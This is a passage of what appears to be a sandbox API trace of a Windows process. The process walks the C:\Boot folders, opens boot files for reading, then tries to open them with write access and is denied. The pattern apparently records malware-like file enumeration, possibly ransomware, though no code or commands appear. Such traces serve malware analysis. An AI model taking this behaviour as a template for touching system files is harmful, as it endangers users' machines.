Size=0x20) returned 0x883b0 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.124] AreFileApisANSI () returned 1 [0083.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.124] AreFileApisANSI () returned 1 [0083.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0083.124] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.125] GetFileType (hFile=0x42c) returned 0x1 [0083.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.125] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.125] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.125] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.125] CloseHandle (hObject=0x42c) returned 1 [0083.125] AreFileApisANSI () returned 1 [0083.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0083.125] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.126] GetLastError () returned 0x5 [0083.126] GetLastError () returned 0x5 [0083.126] SetLastError (dwErrCode=0x5) [0083.126] GetLastError () returned 0x5 [0083.126] SetLastError (dwErrCode=0x5) [0083.126] GetLastError () returned 0x5 [0083.126] SetLastError (dwErrCode=0x5) [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.126] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.127] AreFileApisANSI () returned 1 [0083.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fi-FI\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.127] AreFileApisANSI () returned 1 [0083.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 30 [0083.127] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.127] GetFileType (hFile=0x42c) returned 0x1 [0083.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.128] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.128] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.128] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.128] CloseHandle (hObject=0x42c) returned 1 [0083.128] AreFileApisANSI () returned 1 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fi-FI\\memtest.exe.mui") returned 30 [0083.128] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.129] GetLastError () returned 0x5 [0083.129] GetLastError () returned 0x5 [0083.129] SetLastError (dwErrCode=0x5) [0083.129] GetLastError () returned 0x5 [0083.129] SetLastError (dwErrCode=0x5) [0083.129] GetLastError () returned 0x5 [0083.129] SetLastError (dwErrCode=0x5) [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.129] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69498, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0083.129] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.130] AreFileApisANSI () returned 1 [0083.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts", lpUsedDefaultChar=0x0) returned 14 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.130] AreFileApisANSI () returned 1 [0083.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887e8 [0083.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887e8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\Fonts") returned 14 [0083.130] CreateFileW (lpFileName="C:\\Boot\\Fonts" (normalized: "c:\\boot\\fonts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.130] GetLastError () returned 0x5 [0083.130] GetLastError () returned 0x5 [0083.130] SetLastError (dwErrCode=0x5) [0083.130] GetLastError () returned 0x5 [0083.130] SetLastError (dwErrCode=0x5) [0083.130] GetLastError () returned 0x5 [0083.130] SetLastError (dwErrCode=0x5) [0083.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.131] AreFileApisANSI () returned 1 [0083.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0083.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\Fonts") returned 14 [0083.131] CreateFileW (lpFileName="C:\\Boot\\Fonts" (normalized: "c:\\boot\\fonts"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.131] GetLastError () returned 0x5 [0083.131] GetLastError () returned 0x5 [0083.131] SetLastError (dwErrCode=0x5) [0083.131] GetLastError () returned 0x5 [0083.131] SetLastError (dwErrCode=0x5) [0083.131] GetLastError () returned 0x5 [0083.131] SetLastError (dwErrCode=0x5) [0083.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.131] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.132] FindFirstFileExW (in: lpFileName="C:\\Boot\\Fonts\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78750 [0083.132] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.182] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0083.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0083.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) 